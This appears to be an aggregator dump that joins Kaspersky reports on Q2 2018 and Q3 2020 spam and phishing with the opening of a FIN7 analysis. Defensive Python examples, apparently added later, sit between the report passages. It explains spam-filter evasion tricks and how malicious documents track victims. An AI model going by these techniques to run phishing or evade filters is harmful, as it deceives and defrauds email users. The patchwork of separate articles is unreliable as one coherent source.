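    like one of the protected handles. The genuine handle itself is skipped."""
    hits = []
    for cand in candidates:
        for real in protected:
            if cand.lstrip("@").lower() == real.lstrip("@").lower():
                continue
            score = lookalike_score(cand, real)
            if score >= threshold:
                hits.append((cand, real, round(score, 3)))
    return hits


if __name__ == "__main__":
    # Constructed handle lists, not data from the report.
    protected = ["elonmusk", "pavel_durov"]
    seen_in_replies = ["elonrnusk", "pavel__durov", "e1on_musk", "weather_bot"]
    for hit in find_impersonations(seen_in_replies, protected):
        print(hit)
```

The threshold is a trade-off: 0.9 catches a single inserted separator or one substituted character in a handle of eight or more characters while ignoring unrelated names; the exact-match branch after normalization is what catches the underscore doubling regardless of length.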
However, it is easy to get the account unblocked by entering a Captcha and a code sent via text message, after which the user can keep Elon's name or change it to anything they want, and the account will not be blocked again. It is also unclear whether Twitter will block the obfuscated names of famous people that cybercriminals so often exploit.\n\nAnother measure taken by the social network is blocking accounts that post links to Elon Musk's account. Just as in the previous example, the account can be unblocked by entering a Captcha and confirming a phone number via a code received in a text message.\n\nThis scam has started spreading to other platforms as well. Fake accounts can also be found on Instagram.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10124414/180810-spam-report-q2-18-10-5.jpg>)\n\n_Vitalik Buterin's fake Instagram account_\n\n### Facebook\n\nOn Facebook, in addition to the aforementioned distribution of content through viral threads, cybercriminals often use the advertising mechanisms offered by the social network itself. We have recorded instances of get-rich-quick schemes being spread through Facebook ads.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10122556/180810-spam-report-q2-18-11.png>)\n\n_Fraudulent website ad on Facebook_\n\nAfter clicking on the ad, the user is redirected to a website where, after completing a few steps, they are offered a reward. To receive it, the user must pay a fee, enter their credit card information, or share some personal details. Of course, no reward ever arrives.\n\n### Search results\n\nAds with malicious content and links to phishing sites can be found not only on social networks, but also on the search results pages of major search engines. 
This has recently become a popular method of advertising fake ICO project websites.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10122602/180810-spam-report-q2-18-12.png>)\n\n_Users do not always notice the "Ad" label next to the ads_\n\n## Spammer tricks\n\nOver the past quarter, spammers tried the following new tricks to evade filters.\n\n### Double email headers\n\nWhen generating spam emails, spammers put two From fields in the email header. The first From field contained a legitimate address, usually one from a well-known organization whose reputation is untarnished by spam scandals, while the second contained the actual spammer address, which had nothing to do with the first one. The spammers expected filters to judge the email by the first From field, forgetting that modern anti-spam solutions rely not only on the technical part of the email but also on its content. The trick is also self-defeating at the protocol level: RFC 5322 allows at most one From field per message, and the DMARC specification (RFC 7489, section 6.6.1) tells receivers to reject messages that carry more than one, precisely so that the authenticated sender identity cannot be switched this way.\n\n### Subscription forms\n\nIn this scheme, spam messages arrive in recipients' inboxes disguised as automatic mailing-list subscription confirmations. Spammers generated them through regular websites that allow unlimited user registration (especially ones that accept the same email address more than once). A script auto-filled the subscription forms with recipient addresses taken from previously collected (or purchased) databases. The spam content was a short phrase with a link to a spam resource, inserted into one of the mandatory fields in the form (in particular, the recipient name). 
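Both tricks above have cheap countermeasures, one on the receiving side and one on the side of the site whose subscription form is abused. The following added example (not code from the report) shows a header check that flags any singleton header occurring more than once, and a server-side validator for the free-text name field of a subscription form that refuses anything a mail client would render as a link, together with a once-per-address gate. The sample messages are constructed for the example.

```python
import email
import re
from email import policy

# RFC 5322 section 3.6 allows each of these at most once per message.
SINGLETON_HEADERS = ("from", "sender", "reply-to", "to", "cc", "subject",
                     "date", "message-id", "in-reply-to", "references")


def duplicate_singleton_headers(raw: bytes) -> dict:
    """Return {header-name: [values...]} for singleton headers that occur more
    than once. Parsed with the compat32 policy so duplicates are kept verbatim
    instead of being normalized away by a stricter header parser."""
    msg = email.message_from_bytes(raw, policy=policy.compat32)
    return {name: msg.get_all(name) for name in SINGLETON_HEADERS
            if len(msg.get_all(name) or []) > 1}


# Anything a mail client would turn into a clickable link.
URL_LIKE = re.compile(r"https?://|www\.|\b[a-z0-9-]+\.[a-z]{2,}(?:/\S*)?", re.I)
# Letters (any script), spaces, apostrophes, hyphens and dots; must start with a letter.
NAME_OK = re.compile(r"^[^\W\d_](?:[^\W\d_]|[ '.\-])*$")


def validate_display_name(name: str, max_len: int = 64):
    """Server-side check for the free-text 'name' field of a subscription form.
    Returns (accepted, reason). Rejecting URL-like text here is what stops the
    confirmation email from carrying the spammer's link under the site's name."""
    name = name.strip()
    if not name or len(name) > max_len:
        return False, "empty or too long"
    if URL_LIKE.search(name):
        return False, "contains a URL-like token"
    if not NAME_OK.fullmatch(name):
        return False, "unexpected characters"
    return True, ""


def accept_subscription(address: str, name: str, already_confirmed: set):
    """Combine the name check with the other gap the spammers used:
    the same address being subscribed over and over."""
    key = address.strip().lower()
    if key in already_confirmed:
        return False, "address already subscribed"
    ok, reason = validate_display_name(name)
    if not ok:
        return False, reason
    already_confirmed.add(key)
    return True, ""


# Constructed samples, not messages from the report.
SPAM_WITH_TWO_FROM = b"""From: Statements <noreply@bank.example>
From: Promo <deals@spammer.example>
To: victim@example.net
Subject: Your statement is ready
Date: Mon, 02 Jul 2018 10:00:00 +0000
Message-ID: <a1@spammer.example>

Open the attached statement.
"""

CLEAN_MESSAGE = b"""From: Statements <noreply@bank.example>
To: victim@example.net
Subject: Your statement is ready
Date: Mon, 02 Jul 2018 10:00:00 +0000
Message-ID: <b2@bank.example>

Open the attached statement.
"""

if __name__ == "__main__":
    print(duplicate_singleton_headers(SPAM_WITH_TWO_FROM))   # {'from': [two values]}
    print(duplicate_singleton_headers(CLEAN_MESSAGE))        # {}
    seen = set()
    print(accept_subscription("victim@example.net", "Jean-Luc O'Neil", seen))
    print(accept_subscription("victim@example.net", "Get 50% off at bit.ly/abc", seen))
```

On the mail side, a duplicate From is reason enough to reject at SMTP time; there is no legitimate software that emits it. On the web side, the safest confirmation email is one that does not echo free-text fields at all, and the validator above is the fallback for forms that must.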
As a result, the user received a notification sent from a legitimate mail address that contained a spam link in place of their name.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10122609/180810-spam-report-q2-18-13.png>)\n\n_An example of spam sent through the subscription service of a legitimate site_\n\n## Statistics: spam\n\n### Proportion of spam in email traffic\n\nProportion of spam in global email traffic, Q1 and Q2 2018 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10122615/180810-spam-report-q2-18-14.png>)\n\nIn Q2 2018, the largest share of spam was recorded in May, at 50.65%. The average share of spam in global mail traffic was 49.66%, 2.16 p.p. lower than in the previous reporting period.\n\n### Sources of spam by country\n\nSpam-originating countries, Q2 2018 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10122622/180810-spam-report-q2-18-15.png>)\n\nVietnam, the leading spam-originating country in the previous quarter, fell to seventh place in Q2 2018 (3.98%) and was replaced at the top by China (14.36%). Second and third places, the USA and Germany, are only one percentage point apart, with 12.11% and 11.12% respectively. France occupied fourth place (4.42%) and Russia fifth (4.34%). Great Britain took tenth place (2.43%).\n\n### Spam email size\n\nSpam email size, Q1 and Q2 2018 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10122628/180810-spam-report-q2-18-16.png>)\n\nThe Q2 2018 results show that the share of very small spam messages (up to 2 KB) fell by 2.45 p.p. to 79.17%. The share of 5-10 KB spam messages, on the other hand, grew somewhat (by 1.45 p.p.) compared with the previous quarter, to 5.56%.\n\nThe share of 10-20 KB spam messages was practically unchanged, going down by 0.93 p.p. to 3.68%. 
20-50 KB spam messages followed a similar trend, their share decreasing by 0.4 p.p. (to 2.68%) compared with the previous reporting period.\n\n### Malicious attachments: malware families\n\nTop 10 malware families, Q2 2018 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10122634/180810-spam-report-q2-18-17.png>)\n\nAccording to the Q2 2018 results, the most widely distributed malware family by mail was Exploit.Win32.CVE-2017-11882 (10.35%). This verdict covers the various malicious documents that exploit CVE-2017-11882, a vulnerability in the Equation Editor component of Microsoft Office that is typically triggered through Word attachments. The share of mail carrying the Trojan-PSW.Win32.Fareit family, which steals user information and passwords, decreased during the second quarter; it lost first place and now occupies second (5.90%). Third and fourth places went to Backdoor.Win32.Androm (5.71%) and Backdoor.Java.QRat (3.80%). The Worm.Win32.WBVB family was the fifth most popular with cybercriminals.\n\n### Countries targeted by malicious mailshots\n\nDistribution of Mail Anti-Virus triggers by country, Q2 2018 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10122641/180810-spam-report-q2-18-18.png>)\n\nThe first, second, and third places among the countries with the highest number of Mail Anti-Virus triggers in Q2 2018 were unchanged. Germany remained first (9.54%), followed by Russia and Great Britain (8.78% and 8.67%, respectively). Fourth and fifth places were taken by Brazil (7.07%) and Italy (5.39%).\n\n## Statistics: phishing\n\nIn Q2 2018, the Anti-Phishing system prevented **107,785,069** attempts to connect users to malicious websites. 
9.6% of all Kaspersky Lab users around the world were subject to attack.\n\n### Geography of attacks\n\nThe country with the highest percentage of users attacked by phishing in Q2 2018 was again Brazil, with 15.51% (-3.56 p.p.).\n\nGeography of phishing attacks, Q2 2018 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10122648/180810-spam-report-q2-18-19.png>)\n\n**Country** | **%*** \n---|--- \nBrazil | 15.51 \nChina | 14.77 \nGeorgia | 14.44 \nKyrgyzstan | 13.60 \nRussia | 13.27 \nVenezuela | 13.26 \nMacao | 12.84 \nPortugal | 12.59 \nBelarus | 12.29 \nSouth Korea | 11.66 \n \n_* Percentage of users whose Anti-Phishing system triggered against all Kaspersky Lab users in the respective country._\n\n### Organizations under attack\n\n_The rating of attacks by phishers on different categories of organizations is based on detections by Kaspersky Lab's heuristic Anti-Phishing component. It is activated every time the user attempts to open a phishing page, either by clicking a link in an email or a social media message, or as a result of malware activity. When the component is triggered, a banner is displayed in the browser warning the user about a potential threat._\n\nIn Q2 2018, the Global Internet Portals category again took first place with 25.00% (+1.3 p.p.).\n\n_Distribution of organizations affected by phishing attacks by category, Q2 2018._ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10122656/180810-spam-report-q2-18-20.png>)\n\nThe share of attacks on organizations that can be combined into a general Finance category (banks at 21.10%, online stores at 8.17%, and payment systems at 6.43%) fell to 35.70% (-8.22 p.p.). IT companies were targeted more often in the second quarter than in the first: this category saw an increase of 12.28 p.p. 
to 13.83%.\n\n## Conclusion\n\nThe average share of spam in world mail traffic this quarter, 49.66%, fell 2.16 p.p. compared with the previous reporting period, and the Anti-Phishing system prevented more than 107M attempts to connect users to phishing sites, 17M more than in the first quarter of 2018.\n\nIn this quarter, malefactors actively used GDPR, World Cup, and cryptocurrency themes, and links to malicious websites could be found on social networks and in messengers (users were often distributing them themselves), as well as in the advertising served by large search engines.\n\nExploit.Win32.CVE-2017-11882 was the most widely distributed malware family via mail, at 10.35%. Trojan-PSW.Win32.Fareit fell from first place to second (5.90%), and third and fourth places were taken by Backdoor.Win32.Androm (5.71%) and Backdoor.Java.QRat (3.80%).\n\nID SECURELIST:03923D895F0F0B7EB3A51F48002D1416 Type securelist Title Spam and phishing in Q2 2018 Published 2018-08-14T10:00:36 Modified 2018-08-14T10:00:36 Source https://securelist.com/spam-and-phishing-in-q2-2018/87368/\n\nType securelist (blog) Last seen 2020-11-12T10:20:22 CVE list CVE-2017-11882\n\n## Quarterly highlights\n\n### Worming their way in: cybercriminal tricks of the trade\n\nThese days, many companies distribute marketing newsletters via online platforms. In terms of capabilities, such platforms are quite diverse: they send out advertising and informational messages, harvest statistics (for example, about clicked links in emails), and the like. At the same time, such services attract both spammers, who use them to send their own mailings, and cybercriminals, who try to gain access to user accounts, usually through phishing. 
As a result, attackers also get their hands on user-created mailing lists, which allows them to disseminate mass advertising or phishing messages that filtering systems sometimes let through.\n\nAccordingly, in Q3 we registered an increase in the number of messages sent [using the Sendgrid platform](<https://krebsonsecurity.com/2020/08/sendgrid-under-siege-from-hacked-accounts/>). A significant portion of them were phishing attacks aimed at stealing login credentials for major resources. The emails were no different from traditional phishing, save for the legitimate headers and link to Sendgrid, which redirected the recipient to a phishing site. To the observant eye, the address bar and From field would reveal the messages to be fake.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/11/12092048/sl_Spam_report_Q3_2020_01.png>)\n\n### Call me!\n\nIn [our previous quarterly report](<https://securelist.com/spam-and-phishing-in-q2-2020/97987/#srochno-trebuyutsya-vashi-dannye>), we talked about an increasingly common scam whereby fraudsters send emails purportedly from large companies with a request to urgently contact support at the given phone number. Users who contacted the operator were then asked for information, such as bank card details, which could then be used to empty their account. The most commonly used toll-free numbers have specific three-digit prefixes after the country code (for example: 800, 888, 844).\n\nIn Q3 2020, we observed new versions of such schemes warning not only about unauthorized account access, but about money transactions supposedly made by the user. The attackers' calculation is that, on seeing a message about a financial transaction, the client will grab their phone and dial the support number highlighted in bold. 
Such emails do not contain links, and the message itself is an image, which makes it harder to detect.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/11/12092134/sl_Spam_report_Q3_2020_05.png>)\n\nScammers like such schemes because sending spam is much cheaper and easier than calling potential victims. To avoid swallowing the bait, call the support service using the number on the organization's official website (not the one in the email), or use an app that protects against telephone fraud by checking outgoing call numbers.\n\n### COVID-19 and spam topics\n\n#### Facebook grants\n\nIn Q3 2020, many users of social networks and messengers saw a screenshot with some interesting news: CNBC, it said (in broken English, always a red flag), had reported that Facebook was paying out compensation to victims of COVID-19. To get yours, all you had to do was follow the link and fill out a number of documents.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/11/12092224/sl_Spam_report_Q3_2020_06.png>)\n\nThe link had nothing to do with Facebook and led to a fake page resembling the website of Mercy Corps, an organization dedicated to helping victims of natural disasters and armed conflict. To apply, you had to enter your Facebook username and password, then verify your identity by providing personal information, including an SSN (social security number, issued to US citizens and residents). This last detail suggests that the attack was aimed at US residents. Users who entered all the requested data gave the cybercriminals not only access to their social network account, but also personal information that could then be used for identity theft or bank card fraud.\n\nIt should be noted that the scheme was based on official news that Facebook was indeed ready to provide support to victims of COVID-19. 
But it only concerned grants for companies, not individuals.\n\n#### Tourist phishing\n\nThe coronavirus pandemic, which has decimated the tourist trade, has also had an effect on scammers: this quarter saw fewer emails offering attractive summer breaks than usual. However, the pandemic did not stop scammers; it only redirected their attention.\n\nIn Q3, Airbnb and Expedia Group users were the most frequent targets of phishing attacks. Fake pages hungry for user credentials were very faithful to the design of the official websites, distinguishable only by looking closely at the address bar, where most often the domain was unrelated to the target company or belonged to a free hosting service.\n\nSo as not to reveal their cards too soon, scammers use URL-shortening services and distribute messages on social networks and in messengers, where shortened links look organic. In their messages, scammers offer cheap tickets or bargain hotel deals. It is impossible to tell where such a link leads just by looking at it, which is what attackers play upon (a shortened link can be expanded without visiting it, but few users bother). Accounts stolen in this way can be used, for example, for money laundering.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/11/12092251/sl_Spam_report_Q3_2020_07.png>)\n\nPhishers also forged pages with rental offers: visitors could view photos of apartments and read detailed information about the alleged terms and conditions. Lower down the page were rave reviews from past clients, intended to lull the victim into a false sense of security.\n\nThe "landlord" in each case agreed to rent out the apartment, but asked for an advance payment, and then disappeared as soon as the money was deposited, together with the fake page. 
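The address-bar check that the tourist-phishing pages above depend on victims skipping can be automated once a shortened link has been expanded to its final URL. The following is an added example, not code from the report: it judges a URL by its registrable domain rather than by whether the brand name appears somewhere in it, and reports the usual lures (brand in a subdomain or in the userinfo before an "@", free hosting, a bare IP address). The brand allowlist, the free-hosting list and the public-suffix stand-in are assumptions for the example, and the sample URLs use reserved example domains.

```python
import re
from urllib.parse import urlsplit

# Assumed allowlist of the domains each brand really uses (constructed for the
# example; a real deployment would maintain it from the brand's own inventory).
BRAND_DOMAINS = {
    "airbnb": {"airbnb.com", "airbnb.co.uk"},
    "expedia": {"expedia.com", "expedia.co.uk"},
}
# Free-hosting / blog / dynamic-DNS suffixes often found under phishing pages (assumed list).
FREE_HOSTING = {"000webhostapp.com", "weebly.com", "github.io", "blogspot.com", "duckdns.org"}
# Tiny stand-in for the Public Suffix List; real code should use a PSL library.
TWO_LABEL_SUFFIXES = {"co.uk", "com.br", "co.jp", "com.au"}
IPV4 = re.compile(r"\d{1,3}(?:\.\d{1,3}){3}")


def registrable_domain(host: str) -> str:
    """'login.airbnb.co.uk' -> 'airbnb.co.uk', 'a.b.example' -> 'b.example'."""
    labels = host.lower().rstrip(".").split(".")
    if len(labels) >= 3 and ".".join(labels[-2:]) in TWO_LABEL_SUFFIXES:
        return ".".join(labels[-3:])
    return ".".join(labels[-2:])


def classify_url(url: str) -> dict:
    """Judge a (fully expanded) URL the way a careful user reads the address bar.

    A URL is 'legitimate' for a brand only when its registrable domain is one of
    that brand's. The brand string appearing anywhere else (subdomain, userinfo,
    path) is the classic lure and is reported as a reason."""
    parts = urlsplit(url if "://" in url else "http://" + url)
    host = (parts.hostname or "").lower()
    reg = registrable_domain(host) if host else ""
    result = {"url": url, "host": host, "registrable_domain": reg,
              "brand": None, "verdict": "unknown", "reasons": []}
    for brand, domains in BRAND_DOMAINS.items():
        if reg in domains:
            result.update(brand=brand, verdict="legitimate")
            return result
        if brand in host or brand in (parts.username or "") or brand in parts.path.lower():
            result["brand"] = brand
    if result["brand"]:
        result["reasons"].append("brand-outside-registrable-domain")
    if reg in FREE_HOSTING:
        result["reasons"].append("free-hosting")
    if parts.username:                      # e.g. https://www.expedia.com@203.0.113.5/
        result["reasons"].append("userinfo-trick")
    if IPV4.fullmatch(host):
        result["reasons"].append("bare-ip")
    if result["reasons"]:
        result["verdict"] = "suspicious"
    return result


if __name__ == "__main__":
    # Constructed URLs (reserved documentation names), not IOCs from the report.
    for u in ["https://www.airbnb.com/rooms/123",
              "https://airbnb.com.secure-login.example/verify",
              "http://expedia-deals.000webhostapp.com/",
              "https://www.expedia.com@203.0.113.5/",
              "https://summer-offers.example/"]:
        r = classify_url(u)
        print(r["verdict"], r["host"], r["reasons"])
```

Expanding the short link first matters: resolve the redirect chain with a client that does not render or execute anything (a HEAD request that records each Location header is enough) and classify only the final URL, since the shortener's own domain will always look harmless.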
In this instance, the cybercriminals also banked on the juicy offer (low price, big discount) distracting the victim from looking at the URL and checking the information on the site.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/11/12092307/sl_Spam_report_Q3_2020_08.jpg>)\n\n### Attacks on the corporate sector\n\n#### Malicious mail\n\n[We have already written](<https://securelist.com/spam-and-phishing-in-q2-2020/97987/#waiting-for-your-package-keeping-your-data-secure-and-your-computer-clean>) about the distribution of malicious files disguised as notifications from delivery services. These continued this quarter as well: we uncovered a mailing targeting employees connected to sales in some capacity. The scammers persuaded recipients to open the attached documents, supposedly to pay customs duties for the import of goods. Instead of documents, the attachment contained Backdoor.MSIL.Crysan.gen.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/11/12092426/sl_Spam_report_Q3_2020_09.png>)\n\nMalicious mailings with "reminders" about online meetups deserve a separate mention. For example, one of them asked the recipient to join a Zoom conference by clicking the attached link. Instead of a meeting, the user ended up on a WeTransfer phishing page. If the user fell for the trap and entered their WeTransfer credentials, the attackers gained access to the company's files stored in this cloud.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/11/12092447/sl_Spam_report_Q3_2020_10.png>)\n\nAnother mailing informed users that a Microsoft SharePoint document had been shared with them. 
After clicking the link, the victim was taken to a fake Microsoft login page that helped the cybercriminals steal account usernames and passwords.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/11/12092506/sl_Spam_report_Q3_2020_11.png>)\n\nFar more dangerous were meeting notifications containing malicious files. For example, the at-first-glance harmless message below contained HEUR:Trojan-Downloader.Script.Generic.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/11/12092524/sl_Spam_report_Q3_2020_12.png>)\n\nAnd Trojan-Banker.Win32.ClipBanker, downloaded via the link in the email below, is used to steal financial (including cryptocurrency-related) information.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/11/12092544/sl_Spam_report_Q3_2020_13.png>)\n\n#### Mail scanner\n\nTo gain access to corporate accounts, cybercriminals distributed messages stating that a virus had been found in the recipient's mailbox and advising an urgent scan, otherwise the account would be disabled. The messages, disguised as notifications from infosec companies, were sent from a free mail address and used neutral sender names like Email Security Team to avoid unnecessary specifics.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/11/12092605/sl_Spam_report_Q3_2020_14.png>)\n\nThe cybercriminals reckoned on the combined threat of a computer virus and a deactivated work email account forcing the recipient to overlook the oddities of the message. For example, such an email could plausibly come from the company's own IT or security department, but not from a third party. The page that opened on clicking the link resembled a corporate resource in neither its address nor its layout. For added believability, the cybercriminals placed the logos of all the major infosec companies on it.\n\nTo start a "virus scan", the user was asked to enter the username and password for their corporate mailbox. 
That said, the "scan" started even if arbitrary credentials were entered in the fields:\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/11/12092624/sl_Spam_report_Q3_2020_15.png>)\n\n## Statistics: spam\n\n### Proportion of spam in mail traffic\n\n_Proportion of spam in global mail traffic, Q2 2020 - Q3 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/11/12093946/01-en-spam-report-q3-2020.png>))_\n\nIn Q3 2020, the largest share of spam was recorded in August (50.07%). The average share of spam in global mail traffic was 48.91%, down 1.27 p.p. against the previous reporting period.\n\n### Sources of spam by country\n\n_Sources of spam by country, Q3 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/11/12094027/03-en-spam-report-q3-2020.png>))_\n\nThe Top 5 countries by amount of outgoing spam remained the same as in the previous quarter; only their shares changed. The biggest increase came from Russia, which ranked first, jumping by 5 p.p. to 23.52%. The shares of the remaining top five did not move by more than one percentage point: Germany in second place had 11.01%, the US in third 10.85%, France 6.69%, and China in fifth 6.33%.\n\nThe bottom half of the Top 10 changed more significantly. For instance, it said goodbye to Turkey, which this time took 11th place (1.73%). Sixth place was taken by the Netherlands (3.89%), seventh by Brazil (3.26%), eighth by Spain (2.52%), ninth by Japan (2.30%), and Poland (1.80%) rounds out the Top 10, up one position on last quarter.\n\n### Spam email size\n\n_Spam email size, Q2 2020 - Q3 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/11/12094113/04-en-spam-report-q3-2020.png>))_\n\nThe downward trend in the number of very small emails continued in Q3 2020; their share decreased significantly, by 13.21 p.p. to 38.09%. 
The share of emails sized 20-50 KB grew by 12.45 p.p. to 28.20% of the total number of registered spam emails, while the share of emails 10-20 KB in size fell to 8.31% (-2.78 p.p.). Also lower was the share of spam messages sized 100-200 KB, this time 1.57%.\n\n### Malicious attachments: malware families\n\n_Number of Mail Anti-Virus triggerings, Q2 2020 - Q3 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/11/12094147/05-en-spam-report-q3-2020.png>))_\n\nThroughout Q3 2020, our security solutions detected a total of **51,025,889** malicious email attachments, almost **8 million** more than in the previous reporting period.\n\n_Top 10 malicious attachments in mail traffic, Q3 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/11/12094224/06-en-spam-report-q3-2020.png>))_\n\nThe most widespread malware in Q3 mail traffic was assigned the verdict Trojan-PSW.MSIL.Agensla.gen (8.44%). In second place was Exploit.MSOffice.CVE-2017-11882.gen (5.67%), while Trojan.MSOffice.SAgent.gen (4.85%) came third.\n\n_Top 10 malware families in mail traffic, Q3 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/11/12094259/07-en-spam-report-q3-2020.png>))_\n\nThis quarter's most widespread malware family was [Trojan-PSW.MSIL.Agensla](<https://threats.kaspersky.com/en/threat/Trojan-PSW.MSIL.Agensla/>) (12.67%), up from second place in the last reporting period, while last quarter's leader [Trojan.Win32.Agentb](<https://threats.kaspersky.com/en/threat/Trojan.Win32.Agentb/>) finished second (8.78%). 
Third place, as in the previous quarter, went to [Exploit.MSOffice.CVE-2017-11882](<https://threats.kaspersky.com/en/threat/Exploit.MSOffice.CVE-2017-11882/>) (8.03%).\n\n### Countries targeted by malicious mailshots\n\n_Distribution of Mail Anti-Virus triggerings by country, Q3 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/11/12094333/08-en-spam-report-q3-2020.png>))_\n\nSince the beginning of the year, Spain has led by number of Mail Anti-Virus triggerings. In Q3, users in this country accounted for 7.76% of attacks. In second place this time was Germany (7.05%), knocking Russia (5.87%) into third.\n\n## Statistics: phishing\n\nIn Q3 2020, the Anti-Phishing system prevented **103,060,725** attempts to redirect users to fake pages, almost **3.2 million** fewer than in Q2. The share of unique attacked users amounted to **7.67%** of the total number of users of Kaspersky products.\n\n### Attack geography\n\nThis time, the country with the largest proportion of users attacked by phishers was Mongolia (15.54%).\n\n_Geography of phishing attacks, Q3 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/11/12094409/09-en-spam-report-q3-2020.png>))_\n\nIsrael (15.24%) lies close behind in second place, with France (12.57%) this time in third.\n\n### Top-level domains\n\nThe most popular top-level domain with phishers this quarter, as before, was COM (40.09% of the total number of top-level domains used in attacks). Silver went to XYZ (5.84%), and bronze to NET (3.00%). 
RU finished in fourth place (2.93%), and BUZZ in fifth (2.57%).\n\n_Top-level domains most popular with phishers, Q3 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/11/12094443/10-en-spam-report-q3-2020.png>))_\n\n### Organizations under attack\n\n_The rating of attacks by phishers on different categories of organizations is based on detections by the Kaspersky Anti-Phishing component. This component detects pages with phishing content that the user tried to access by following email or web links, regardless of how the user got to the page: by clicking a link in a phishing email or in a message on a social network, or after being redirected by a malicious program. When the component is triggered, a banner is displayed in the browser warning the user about a potential threat._\n\nAs before, the Online Stores category absorbed the most phishing attacks, despite its share dropping slightly against Q2 2020 (by 0.20 p.p.) to 19.22%. Global Web Portals (14.48%) in second position and Banks (10.89%) in third were also non-movers.\n\n_Distribution of organizations subjected to phishing attacks by category, Q3 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/11/12094523/11-en-spam-report-q3-2020.png>))_\n\n## Conclusion\n\nThe COVID-19 topic, which appeared in Q1 this year, is still in play for spammers and phishers. In our view, the so-called second wave could lead to a surge in mailings offering various coronavirus-related treatments. Moreover, against the backdrop of the worsening economic situation, we could see a rise in the number of scam mailings promising a big payout in exchange for a small upfront sum.\n\nThe average share of spam in global mail traffic (48.91%) this quarter decreased by 1.27 p.p. 
against the previous reporting period, while the number of attempted redirects totaled nearly 103 million.\n\nFirst place in the list of spam-source countries in Q3 again went to Russia, with a share of 23.52%. Our security solutions blocked 51,025,889 malicious attachments; the most popular malware family in spam mailings was Trojan-PSW.MSIL.Agensla, with a 12.67% share.\n\nID SECURELIST:F1FC61836DCAA7F1E27411092B208523 Type securelist Title Spam and phishing in Q3 2020 Published 2020-11-12T10:00:54 Modified 2020-11-12T10:00:54 Source https://securelist.com/spam-and-phishing-in-q3-2020/99325/\n\nType securelist (blog) Last seen 2019-05-29T14:29:15 CVE list CVE-2017-11882\n\nOn August 1, 2018, the US Department of Justice announced that it had arrested several individuals suspected of having ties to the FIN7 cybercrime group. FIN7 operations are linked to numerous intrusion attempts that have targeted hundreds of companies since at least 2015. Interestingly, this threat actor created fake companies in order to hire remote pentesters, developers and interpreters to participate in its malicious business. The main goal behind its activities was to steal financial assets from companies, such as debit card data, or to gain access to financial data or to the computers of finance department employees in order to conduct wire transfers to offshore accounts.\n\nIn 2018-2019, researchers of Kaspersky Lab's Global Research and Analysis Team analyzed various campaigns that used the same Tactics, Techniques and Procedures (TTPs) as the historic FIN7, leading the researchers to believe that this threat actor had remained active despite the 2018 arrests. 
In addition, during the investigation, we discovered certain similarities to other attacker groups that seemed to share or copy the FIN7 TTPs in their own operations.\n\n## **Recent FIN7 campaigns**\n\nThe FIN7 intrusion set continued its tailored spear phishing campaigns throughout last year. Kaspersky Lab was able to retrieve some of these exchanges from a FIN7 target. The spear phishing campaigns were remarkably sophisticated from a social engineering perspective: in various cases, the operators exchanged numerous messages with their victims for weeks before sending their malicious documents. The emails were efficient social-engineering attempts that appealed to a wide range of human emotions (fear, stress, anger, etc.) to elicit a response from their victims. One of the domains used by the attackers in their 2018 spear phishing campaign contained more than 130 email aliases, leading us to think that more than 130 companies had been targeted by the end of 2018.\n\n### **Malicious Documents**\n\nWe have seen two types of documents sent to victims in these spear phishing campaigns. The first exploits the INCLUDEPICTURE field of Microsoft Word to get context information about the victim's computer, together with the availability and version number of Microsoft Word: when the field points at a remote URL, Word fetches the image as soon as the document is opened, and the request itself (its source address and User-Agent) tells the operator that the document reached a live target and what it was opened with. The second, which in many cases is an Office document protected with a trivial password such as "12345" or "1234", uses macros to execute a GRIFFON implant on the target's computer; the password also keeps the encrypted macro out of reach of any scanner that does not try it. In various cases, the associated macro also scheduled tasks to make GRIFFON persistent.\n\nInterestingly, following some open-source publications about them, the FIN7 operators seem to have developed a homemade builder of malicious Office documents using ideas from ThreadKit, which they employed during the summer of 2018. The new builder inserts random values in the Author and Company metadata fields. 
